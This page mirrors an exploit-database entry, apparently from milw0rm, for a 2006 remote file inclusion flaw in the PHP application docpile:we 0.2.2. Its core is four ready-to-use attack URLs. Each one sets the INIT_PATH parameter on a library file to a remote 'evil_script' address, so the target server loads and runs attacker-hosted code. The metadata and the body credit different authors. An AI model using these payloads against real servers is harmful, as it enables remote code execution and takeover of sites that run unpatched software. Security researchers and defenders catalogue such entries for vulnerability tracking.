[] NeoSense
E X P L O I T S
title author type platform port cve id

docpile:we 0.2.2 - 'INIT_PATH' Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2006-08-07 
date_updated: 2006-08-08 
verified: 1 
codes: OSVDB-27862;CVE-2006-4075;OSVDB-27861;OSVDB-27860;OSVDB-27859 
tags: 
aliases:  
screenshot_url:  
application_url: 
***********************************
TiTLE: docpile:we  v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability
-
Author: xoron
-
Class : Remote
-
cont@ct: x0r0n[at]hotmail[dot]com
-
URL: http://docpile-we.berlios.de
-
Exploit:
http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/email.inc.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/document.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/auth.inc.php?INIT_PATH=http://evil_script?
-
Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D , sakkkure
***************************************************

# milw0rm.com [2006-08-08]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.